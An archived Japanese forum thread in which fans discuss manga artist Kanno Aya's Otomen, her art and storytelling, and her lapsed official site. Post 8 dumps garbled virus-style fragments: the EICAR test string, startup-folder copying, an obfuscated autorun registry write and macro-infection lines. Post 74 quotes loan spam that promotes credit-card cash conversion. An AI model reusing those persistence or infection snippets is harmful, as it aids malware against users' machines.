5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

■□菅野文 vol.2□■

1 :花と名無しさん:2007/10/18(木) 15:59:54 ID:???0
『別冊花とゆめ』毎月26日発売にて「オトメン(乙男)」を連載中の
菅野文さんの作品を語るスレッド。
2001年花とゆめ1号「ソウルレスキュー」にてデビュー。

前スレ:
■□菅野文(かんのあや)●オトメン(乙男)□■
http://anime2.2ch.net/test/read.cgi/gcomic/1164475177/

●次スレッドは、>>980を踏んだ方が立ててください。
●なお、過疎りやすいようなので、定期的に保守協力をお願いします。
●過去スレ等は>>2-5あたり

・作者公式サイト「さらば侍」
ttp://saraba.kill.jp/
・別冊花とゆめドットコム
ttp://www.betsuhana.com/
・白泉社公式内フレッシュインタビュー
ttp://www.hakusensha.co.jp/mangaq9902/16_kanno/index.html

2 :花と名無しさん:2007/10/18(木) 16:02:16 ID:???0
≪過去スレ≫
菅野文
http://comic6.2ch.net/test/read.cgi/gcomic/1061069462/
◆◇菅野文〜ソウルレスキュー〜◇◆
http://comic.2ch.net/gcomic/kako/1005/10050/1005038481.html

≪作品履歴:コミックス既刊≫
「ソウルレスキュー」全2巻
「ココロに花を!!」全2巻
「北走新選組」全1巻
「凍鉄の花」全1巻
「悪性 -アクサガ-」全2巻
「オトメン(乙男)」3巻まで発売中(2007年10月現在)

≪イラスト作品:既刊≫
「とろけるほど奪われたい!」
著者:ゆらひかる/イラスト:菅野文

≪コミックス未収録作品≫
傷口から流れるあいのうた(ザ花とゆめ2000年10月01日号)
永遠のハニー(花とゆめプラス2004年09月15日号)
悪性 -アクサガ- 連載:1回目(別冊花とゆめ2004年11月号)

3 :花と名無しさん:2007/10/18(木) 16:03:19 ID:???0
11 名前:難しいよ ◆MUZU.P5M  [ sage 花夢5号買ったサ ]  投稿日:02/02/07 09:14
 nノ)/ノ
 | _,.つ
 l |
 \ヽ      ________
   l |     /        /j
  //   /        /  .l
  | l    | . ̄ ̄ ̄ ̄ ̄ ̄|   |
  \ヽ_| ヽ_l/    ヽl_/ |  (ニニヽ、
    ` −| / ヽ    / ヽ |   i  ヽ i
      | | @ | ___ | @ | |   l  / /
      | ヽ_ノ |  | ヽ.ノ |  /  / /
      |    |.____|    .|/  / /
        ̄i ̄i ̄ ̄i ̄i ̄  /  i
        | |   |  |   しl_JJ
        / /    \ヽ、
      / /      i  l
     / /       l  l
     | \     / /
     \_j     L_/
夢色Jank (ソウルレスキュー収録) 菅野文 へんなおもちゃ
http://aa.2ch.net/kao/kako/1012/10128/1012864980.htmlより。

4 :花と名無しさん:2007/10/18(木) 16:11:14 ID:???0
>>1ttp://fmarinos2ch.hp.infoseek.co.jp/cgi-bin/img-box/img20071017112936.jpg


5 :花と名無しさん:2007/10/18(木) 16:12:41 ID:???O
>>1
スレ立て、乙華麗!

6 :花と名無しさん:2007/10/18(木) 16:35:43 ID:???0
>>4
サムネイルで見てなんの画像だ?と思ったら・・・w

7 :花と名無しさん:2007/10/18(木) 16:39:14 ID:???O
挙げパン…?w

8 :花と名無しさん:2007/10/18(木) 18:17:36 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


9 :花と名無しさん:2007/10/18(木) 18:37:55 ID:???0
>>1
乙!!

10 :花と名無しさん:2007/10/18(木) 19:19:24 ID:???0
>>4
一瞬、巻き糞かと

11 :花と名無しさん:2007/10/20(土) 01:36:42 ID:???0
あれ、公式サイトはどこいった?

12 :花と名無しさん:2007/10/20(土) 02:29:16 ID:???0
>>11
あぁ自分もアクセス出来ないな…403になる。
グーグルキャッシュで見ると、10/15まではあったみたいだけど。

13 :花と名無しさん:2007/10/20(土) 13:30:35 ID:???0
忙しくて更新手続きするの忘れたのかもね

14 :花と名無しさん:2007/10/21(日) 02:42:19 ID:???0
公式って閉鎖じゃないよね…?

15 :花と名無しさん:2007/10/21(日) 08:26:29 ID:???0
リヌーアルじゃね?

16 :花と名無しさん:2007/10/23(火) 06:18:19 ID:???0
乙男評判いいから読んでみたけど
1巻はそこそこ読めるのに2巻以降はビミョーだなあ
絵はきれいなんだけどどこかで見た感が…
って書いてて気が付いた倉花千夏っぽい
こっちのがマイナーか

17 :花と名無しさん:2007/10/23(火) 11:20:26 ID:???0
>>16
>倉花千夏っぽい

そう言う人結構見かける
自分も悪性とオトメンの表紙観たとき思った

18 :花と名無しさん:2007/10/23(火) 20:13:23 ID:???0
倉花千夏なんてまだコアすぎるだろ…
ここ某BLゲーやってる人結構いるんだね

19 :花と名無しさん:2007/10/23(火) 21:10:55 ID:???0
咎狗乙

20 :花と名無しさん:2007/10/23(火) 21:53:54 ID:???0
誰かと思ったら咎犬の人か…
そこまで似てると思わなかった

21 :花と名無しさん:2007/10/23(火) 22:36:49 ID:???0
絵は似てないけどキャラは似てると思う

22 :花と名無しさん:2007/10/24(水) 10:19:17 ID:???O
菅野の絵好きなんだけど…原作付きで漫画を描くのに向いていそう…。

23 :花と名無しさん:2007/10/25(木) 17:48:35 ID:???O
>>22
確かに。
この人絵はいいのに話が…っての多いよね。
新選組モノのときは結構「おぉっ!」って思ったけど、あれは史実と言う最強の原作付きだしな〜。

24 :花と名無しさん:2007/10/25(木) 18:55:27 ID:???0
>>22
原作付きでやった方がいいよね。絵は凄い好き。
この人の漫画って淡々と話が進んで盛り上がる場所が
分かり難い印象なんだよね。
次号wktk!っていうのが私は無いから
コミックスで買っているんだけど。


25 :花と名無しさん:2007/10/25(木) 21:40:24 ID:???0
原作付は、もうだめだ…ってくらい何度か作品がコケてからで十分だ
同じ雑誌の原作付がつまらんので、なんでも原作付がいいとは思えん

26 :花と名無しさん:2007/10/26(金) 01:03:59 ID:???0
アトラスのゲームの漫画でも描かせたら嬉々としてやりそうだなw

27 :花と名無しさん:2007/10/26(金) 04:52:21 ID:???0
やっぱりあれ九龍の眼帯モデルなん?
つーか作品コケまくったら普通に仕事なくなると思うんだが

28 :花と名無しさん:2007/10/26(金) 05:08:30 ID:???0
でも菅野さんって、>>2を見てわかる通り
編集から期待されているのか(?)、未収録作品が少ないんだよね。
ここ数年の白泉ってキャリア10年未満の漫画家には、
コミクス発行に厳しい傾向にあるのに・・・。

しばらくは様子見で数回コケたぐらいでは放置されず、
原作付きやイラストなどいろいろ仕事が回ってくると思われ。

29 :花と名無しさん:2007/10/26(金) 12:44:33 ID:???0
投稿→受賞→デビューの流れじゃないからな
編集との結びつきは他の若手よりは強いはず

30 :花と名無しさん:2007/10/26(金) 12:47:13 ID:???0
>>29
それ、知らない。スカウトされたんですか?
教えてチャンですみません。

31 :花と名無しさん:2007/10/26(金) 20:01:27 ID:???0
同人→スカウト→デビューって流れか?
よく知らないがこの人某ゲームの同人やってたみたいだし可能性あるのでは。

32 :花と名無しさん:2007/10/26(金) 22:28:42 ID:???0
ゲームと芸能の同人をやってたって情報は出てるね
ゲーム同人は何ヶ月か前にオクでも確認できてたw

パープルKって名前は一応投稿者の欄に名前があったとかって話なかったっけか
スカウト、編集に見せた原稿をそのままなんかの賞につっこんで受賞、とかってかんじ?

33 :花と名無しさん:2007/10/27(土) 10:54:14 ID:???0
サイト消えたまんまだがこのまま閉鎖とか?

34 :花と名無しさん:2007/10/27(土) 11:37:42 ID:???O
>>30〜32
サイコメトラーの人のアシもしてたからじゃね?

35 :花と名無しさん:2007/10/27(土) 12:34:45 ID:???0
倉花千夏よりは山本佳奈っぽい
ゼ/ロ/サ/ムよりの絵ってことかな

36 :花と名無しさん:2007/10/27(土) 21:43:03 ID:???0
スカウトだったら本スレで祭りになるだろうから
普通に実力でしょ
ウィングスでもなかろうに

37 :花と名無しさん:2007/10/27(土) 23:02:37 ID:???0
りょうがヒーローになりつつある…

38 :花と名無しさん:2007/10/29(月) 00:13:53 ID:???0
普通に実力って言われるほど実力がなく
絵だけ作家ぽいから言われてるんじゃ

39 :花と名無しさん:2007/10/29(月) 12:04:37 ID:???0
同人で描いてたソウルレスキュー持ち込み→連載ありきでデビュー決定

40 :花と名無しさん:2007/10/29(月) 20:45:19 ID:???0
お約束のように聞いてしまうがソースは?
つかそれが事実だとしたら結構凄いことだな。

41 :花と名無しさん:2007/11/01(木) 01:18:54 ID:???0
「オトメン(乙男)」 4巻、2007年12月18日発売。
ttp://www.s-book.com/plsql/com2_detail?isbn=9784592184171

42 :花と名無しさん:2007/11/01(木) 17:28:06 ID:???O
>>41
意外に次の巻出るの早いな
ラブちっくでも載るのかな

43 :花と名無しさん:2007/11/02(金) 15:38:49 ID:???0
出るの早っ!
月刊誌ってこんなに早かったっけ

44 :花と名無しさん:2007/11/04(日) 13:30:39 ID:???0
>>38
今の白癬、絵さえ綺麗ならなんでもいいらしいし無問題なんだろ

45 :花と名無しさん:2007/11/04(日) 13:41:56 ID:???0
>>44
でも乙男、絵だけではここまで売れないよ
現にこの人の過去作パッとしなかったでしょ

46 :花と名無しさん:2007/11/04(日) 18:12:21 ID:???0
過去作は出版社のプッシュがなかったよね
今若い男性アイドルを大量に投下した学園ドラマがウケてるから
低予算で映像化できそうなこの漫画が余計にプッシュされてる気がする

47 :花と名無しさん:2007/11/04(日) 19:10:08 ID:???0
ココロって待遇よかったんじゃないかな?
カラーページの割合が多いと思った。
巻頭かは知らないけど見開きのカラーもあったみたいだし。

48 :花と名無しさん:2007/11/04(日) 19:48:10 ID:???0
デビューしてからずっと待遇いいと思うよ
押して押してやっとキター感じ

49 :花と名無しさん:2007/11/04(日) 20:32:58 ID:???0
でもココロはキャラに特定の彼女ができてから明らかにテンション落ちてつまらなくなった
女の子描くのが苦手なんだろうなこの作家…って思ったから印象に残ってる
オトメンでもその印象が変わらないから、よっぽど女の子描くの好きじゃないんだろうなあ

50 :花と名無しさん:2007/11/04(日) 20:37:42 ID:???0
女の子描くの好きじゃないなら何故花ゆめ系に…
ガンガンとかの少年誌いけば良かったのに

51 :花と名無しさん:2007/11/04(日) 22:06:47 ID:???0
乙男は各店舗のディスプレイがそれまでの比ではなかった
全国展開の大型書店でこれでもかっつうほどスペース裂いてプッシュ
あれで売れなければ、終わってるわ

52 :花と名無しさん:2007/11/04(日) 22:12:09 ID:???0
>>49
女性キャラもだけど、男キャラもなんかとってつけたようなテンプレ設定で面白くもなんともなかったな
>>50
少年誌系にいったらキャラクター動いてなんぼだから、とにかく動きのある絵かかにゃならんだろ
動的な絵がまったく描けないのに、通用する訳がない
後、背景手抜きも少年誌でやるなら致命傷

53 :花と名無しさん:2007/11/04(日) 22:14:46 ID:???0
・・・ってか普通に少年誌って、ヒロイン、魅力的な女の子描けないと無理だろ。
この人の描く女って性格も絵自体も男に無理矢理乳くっつけたみたいな感じ。
行くべきところははじめからBLでしたよ。

54 :花と名無しさん:2007/11/05(月) 02:40:45 ID:???0
この人のスレっていつも殺伐としてるよな

55 :花と名無しさん:2007/11/05(月) 06:53:58 ID:???0
作家が作家だからじゃないか

56 :花と名無しさん:2007/11/05(月) 07:22:35 ID:???0
マンセーレスがつくと、執拗に貶すレスが続くので過疎化した気が…。
あとは少女漫画板の住人が全体的に減ってるように思う。

57 :花と名無しさん:2007/11/05(月) 11:26:25 ID:???0
スレができたきっかけが作者様の2ch降臨だったから宿命なんじゃない?
そもそも萌えマンセーだけしたけりゃ外のファンサイトで十分だし

58 :花と名無しさん:2007/11/05(月) 12:50:11 ID:???O
いや初代スレは降臨の前に立ってたよ
でも立ったすぐ後に降臨騒ぎがあったから
自分で自分のスレ立てた疑惑が持ち上がってたけど

59 :花と名無しさん:2007/11/05(月) 13:12:06 ID:???0
2ch自スレで弓月みたいになりたかったのかな…

60 :花と名無しさん:2007/11/05(月) 18:34:17 ID:???0
しかしこの人、たびたび指摘されてる欠点がまったく改善されないな

61 :花と名無しさん:2007/11/06(火) 00:46:37 ID:???0
正直、乙男の2巻ぐらいまで絵に釣られて惰性買いしていたが、
話がすごく面白いと思った事はない。
乙男もすごくプッシュされてた割に2巻から劣化の一途だったし。

62 :花と名無しさん:2007/11/06(火) 07:33:25 ID:???0
ここ見てると、見限るか買い続けるかの瀬戸際な人がたくさんいるんだな
3巻買おうか買うまいか、発売してからずっと悩んでる
絵や設定は好きだしキャラも好きなんだけど…

63 :花と名無しさん:2007/11/06(火) 12:08:57 ID:???0
肝心のストーリーがな・・・

64 :花と名無しさん:2007/11/06(火) 19:18:54 ID:???0
オトメン3巻まで一気に読んですげええ面白えええ!!!!
と思った自分はここでは少数派っぽいな
ヒロインが別に可愛くも何とも無いってところが微妙すぎるけど

65 :花と名無しさん:2007/11/06(火) 19:38:28 ID:???0
このスレの住人自体が少数だから心配するな

66 :花と名無しさん:2007/11/06(火) 20:11:59 ID:???0
3巻まで一気読みだと印象違うかもね
2巻から3巻が出るまでの間に冷静になってたぶん
3巻の粗がすごく目に付いた

67 :花と名無しさん:2007/11/06(火) 20:43:03 ID:???0
1巻も2巻3巻も粗なんて全然分からなかったぞ
ちなみに一気読みじゃないけど
萌えがすごすぎて気づかないだけかもな…
アキラたんのお顔がどんどん美しくなっていくしな

68 :花と名無しさん:2007/11/06(火) 21:35:56 ID:???0
キャラ萌えでなら読めるんじゃない?
ストーリーで読ませて欲しいと思う人にとっては粗だらけでしょ

69 :花と名無しさん:2007/11/06(火) 23:15:46 ID:???0
キャラ萌えや設定萌えが出来るなら今でも面白いと思う
自分は設定萌えで勢いで1巻、続きが気になって2巻買ったけど
それ以降は買っていない

70 :花と名無しさん:2007/11/06(火) 23:45:06 ID:???0
自分の場合、2巻のゲストキャラがみんな同じに見えた
そんでキャラ萌え補正がちょっと薄れたな

71 :花と名無しさん:2007/11/09(金) 21:08:29 ID:???O
>アキラたんのお顔がどんどん美しくなっていくしな

アスカの間違いだよな・・・マユタンを思い出しちまったよ

オトメンの1巻は何度読んでも笑えたなーあれは凄く良かったと思う
2,3巻は似たような展開で

72 :花と名無しさん:2007/11/11(日) 20:03:30 ID:???0
3巻買った時点で売ろうかと悩んだんだけど、読み返してからまた思い止まった。
↑の方で似てる作品の話題が出たけど、正宗って銀○の土○に似てないか。

73 :花と名無しさん:2007/11/12(月) 00:09:25 ID:???0
公式サイトがますますワケわからんことになっとる

74 :花と名無しさん:2007/11/12(月) 00:44:40 ID:???0

ローンとクレジット
2007年11月11日 21:06 saraba | 個別ページ

もしあなたが車を分割払いで買ったとします。そんなときあなたは「ローンで買ったのか」「クレジットで買ったのか」わかっているでしょうか?
たぶん、ほとんどの人が「わからない」と答えるでしょう。
分割払いで買ったあなたは、車検証の所有者の欄を見たことがないのではないでしょうか? ほとんどの人は見ていないものです。
車検証の所有者の欄を見ると「ローン」「クレジット」どちらで買ったかわかります。もし所有者が販売店になっていたなら、あなたはクレジットで買ったのです。もし「ローン」で買ったなら所有者にはあなたの名前が記載されています。
実は、所有者の欄に購入者の名前が記載されていることは少ないのです。販売店はローンよりクレジットを利用することが多いからです。
では、どちらが購入者にとっては得なのでしょうか?
答えは、金利だけに限ればローンのほうが得なのです。しかしローンは手続きが面倒ですのでほとんどの方が販売店の用意するクレジットを意識することもなく申し込んでいます。クレジットカード現金化も意識しましょう。
もし金利の安い分割払いで購入代金を支払いたいのなら是非オートローンを考えてみるべきです。
200万円の車を5年間の分割払いで購入したとき、金利が5%と8%では総支払額は約16万円も違うのですから。

カード現金化との金利の比較は必須です。


(´・ω・`)え、ええ〜…?

75 :花と名無しさん:2007/11/12(月) 02:00:35 ID:???0
レンタルサーバーのアカウント切れて、
誰かが同じURLでアカウント取っちゃった・・・とかか?

76 :花と名無しさん:2007/11/12(月) 03:02:45 ID:???0
>>75
うん、そんなような可能性を感じるね。
まぁ本業(漫画制作)を基本にしてもらって、サイト運営は二の次で構わないが
次の別花掲載時に柱ででも告知してくれるかなぁ?>公式サイトの件。
12月にはオトメン4巻が発売されるから、そっちに裏話が載るかな?

77 :花と名無しさん:2007/11/16(金) 16:40:07 ID:???0
保守

78 :花と名無しさん:2007/11/16(金) 16:41:51 ID:???0
乙男のさきがけはパタリロのプラズマX

79 :花と名無しさん:2007/11/16(金) 16:48:43 ID:???0
そんなの知らない

80 :花と名無しさん:2007/11/16(金) 17:13:30 ID:???0
なにかにつけてパタリロとか昔の作品持ち出す人いるよね。
昔の花夢はホモばかりだったとか
いつも同じ人なんだろうけど、ウザくてしょうがない

81 :花と名無しさん:2007/11/16(金) 20:59:14 ID:???O
ウザいレスがあったら、新しく違う話題をふってスルーすればよいかとw

なんつーか最近オトメンの連載に中だるみ感があるような…
毎号別花買ってるんだが、まだ10/26発売分を読んでない。
最初の頃みたいなwktkがない(´・ω・`)

82 :花と名無しさん:2007/11/16(金) 22:10:55 ID:???0
その中だるみ感は今後も解消されない気がするorz
テコ入れしようにも新キャラ・ゲストキャラ投入くらいしか方法がないみたいだし
かと言って2人にこれ以上の進展が!というのも・・・
良くも悪くもマターリ漫画なんだよなあ

83 :花と名無しさん:2007/11/17(土) 17:35:32 ID:???0
昔の花夢はホモばかりっていうのはまあ真実だからしかたないw
オトメンがホモ漫画ぽい作風だからそう言われるんだろうし

84 :花と名無しさん:2007/11/17(土) 21:40:06 ID:???0
で、今回レズが出たわけだが。

85 :花と名無しさん:2007/11/18(日) 02:53:33 ID:???0
りょうだけがいらない子のような気がしてならない

86 :花と名無しさん:2007/11/18(日) 03:14:31 ID:???0
次号かその次ぐらいで「大和撫子コンテスト」がらぶちっくで
どう利用されるのかは、興味が湧くw
しかし少女漫画の王道とは言え、主役カプー双方にマンセーキャラが
居るのって、ちょっとなぁ。その辺りの続きどうするんだろう。

87 :花と名無しさん:2007/11/18(日) 09:21:36 ID:???0
>>85
同意
男子校に潜む乙女ちっく野郎をアハハウフフと描いてたほうが
作家的には楽だったのかもしれないね…
りょうちゃんも隣の女子高の憧れの君程度だったら
描写されなくてもまだ違和感無かったのに

88 :花と名無しさん:2007/11/19(月) 02:49:37 ID:???O
>>85
あれはわざと作者がああいう風にしてるのかと思ってた。

89 :花と名無しさん:2007/11/19(月) 03:13:26 ID:???0
特定のカノジョを作っておくのは
乙女ちっくだけどオカマでもガチホモでもないよという予防線だろ
飛鳥のキャラ立ての道具

90 :花と名無しさん:2007/11/19(月) 10:31:54 ID:???0
特定の彼女がいてもホモ(バイ)に見えてきかねない書き方してんだから失敗w
彼女って記号さえつけておけばそう見えないよね!っていう保険にしか見えないよ
彼女つくったことにしとけば「彼女」を描写しなくてもホモ漫画とは言わせないもん〜
安心して好みの男キャラだけでアハハウフフ話を展開させるお!ってのが嫌だ

91 :花と名無しさん:2007/11/20(火) 15:58:33 ID:???0
「乙男」っていう設定だけで持ってる感が否めない

92 :花と名無しさん:2007/11/20(火) 19:48:32 ID:???0
別作品を出してスマンが本誌の俺様やNGくらいハッチャけてくれればな
乙男ってニヤリとすることはあっても吹き出すほどの笑いがない

93 :花と名無しさん:2007/11/20(火) 23:50:10 ID:???0
>91
その設定のインパクトもせいぜい2巻くらいが限度だった気がする

あくまでも飛鳥を乙男として描き切るなら、引き延ばしせずに早く終わっておいた方か
いい気がする・・・

94 :花と名無しさん:2007/11/21(水) 17:15:55 ID:???0
乙男2巻まで読んだけど私的には結構面白いと思ったよ。
そのうちドラマ化されそうだとも思った。
でもここでは微妙な感じなんだねw

95 :花と名無しさん:2007/11/21(水) 19:48:34 ID:???O
菅野タソの成長過程を見ていて思うこと
多少デッサンが崩れていても、少女漫画として魅力的な絵が描ければ
読者がついて期待されるが、話作りが物足りないので
ヲタな信者があまり増殖しないし、長続きしない。

デビュー時から眺めてきたけど、オトメンで本格的な成功がなければ
なんか次の期待薄って感じ…。オトメン、掴みはおkだけで終わっトル。

96 :花と名無しさん:2007/11/21(水) 21:32:30 ID:???0
オタの評価と世間の評価は大抵反比例するからな
ヒットはオタより薄い層をどれだけかき集めるかで決まるもんだし
爆発的に面白いものは長続きしない
続くのはある程度型を作って循環させるタイプ
商売的には正解なんじゃないの

97 :花と名無しさん:2007/11/21(水) 23:11:56 ID:???0
2巻まではまあまあだな
3巻からはまた同じ展開なのかよっていう話が増え始め
脇キャラの男に妙な力が入ってるのが感じられてなんだか
モヤモヤしたものが感じられてくる

多分ドラマ化したいんだろうなっていうのは感じるw
学園もので硬派・軟派・メガネ・童顔など多数のイケメンが出てきて絵になるし
それに小道具に金がかからないわりにインパクトある画面が作れそう
フリルやぬいぐるみに囲ませてCGでキラキラさせりゃいいだけだし

98 :花と名無しさん:2007/11/22(木) 16:01:16 ID:???0
>>95にものすごく同意
菅野さんには乙男でもう少し踏ん張ってほしい
このままコケたら二度と長期の連載貰えない気がする。
いっその事、話が破綻してでも美形キャラをこの先大量投入して
ドラマCDとか作って声優ファンをたくさん取り込んで
上手い事アニメやドラマ化出来ないものか…

話変わるけどヒロインのどの絵を見ても目の焦点が恐い。
生気が全然無いような…男キャラはあんなに溌剌としてるのにw

99 :花と名無しさん:2007/11/22(木) 20:19:01 ID:???0
萌え絵特有の黒目がちな目を描こうとして失敗してるんだよ

100 :花と名無しさん:2007/11/23(金) 03:54:15 ID:???O
原作付きの少年漫画とか描いたら売れそう。
小畑健みたいな感じで。

101 :花と名無しさん:2007/11/23(金) 11:00:41 ID:???0
菅野さんは元少年誌志望だってば

102 :花と名無しさん:2007/11/23(金) 16:57:32 ID:???0
菅野さんはアクションっていうか動きのある絵が微妙だから少年誌は厳しそう

103 :花と名無しさん:2007/11/24(土) 01:39:23 ID:???0
少年誌でホモくさい漫画描いたら総叩きされるでしょw

104 :花と名無しさん:2007/11/24(土) 01:49:17 ID:???0
ぜひともコミックブレイドにお越し下さい

105 :花と名無しさん:2007/11/26(月) 20:33:05 ID:???0
やっと3巻読んだ
ヒロインの友人関係とかもあまり描写しないし、細かい性格がぜんぜん掴めないな
下手すると脇キャラの1人みたいな…
キャラクター増えてきたし巻数も増えてきたんだから、
大きい流れの事件とかおこらないかなー
次!次どうなっちゃうの!?みたいなドキドキ感がほしい

106 :花と名無しさん:2007/11/28(水) 15:29:12 ID:???0
>>81
・・・最近って2巻からもうgdgdやん
シアワセな人だな

107 :花と名無しさん:2007/11/28(水) 21:37:17 ID:???0
>>106
どの時点で面白くなくなったと感じるかは、人それぞれでは?
変なところで突っ込み入れるね。

>次!次どうなっちゃうの!?
確かにそう言う展開は全然ないな。

108 :花と名無しさん:2007/12/02(日) 02:25:15 ID:???0
公式ブログに移ったね
カココミって面白い

109 :花と名無しさん:2007/12/02(日) 13:42:40 ID:???0
え、どこに移った?ローン比較ナビしか現れないんだけど…

110 :花と名無しさん:2007/12/02(日) 18:37:39 ID:???O
今月号に新しいブログのURL告知があったんだよ

111 :花と名無しさん:2007/12/03(月) 17:46:53 ID:???0
コミックス派の自分には観ることができなくて残念だ

112 :花と名無しさん:2007/12/03(月) 22:09:53 ID:???0
検索すれば出るべさ

ザ・ワールド・イズ・マインが好きな漫画1位とは…
この人らしくていいけど。

25 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)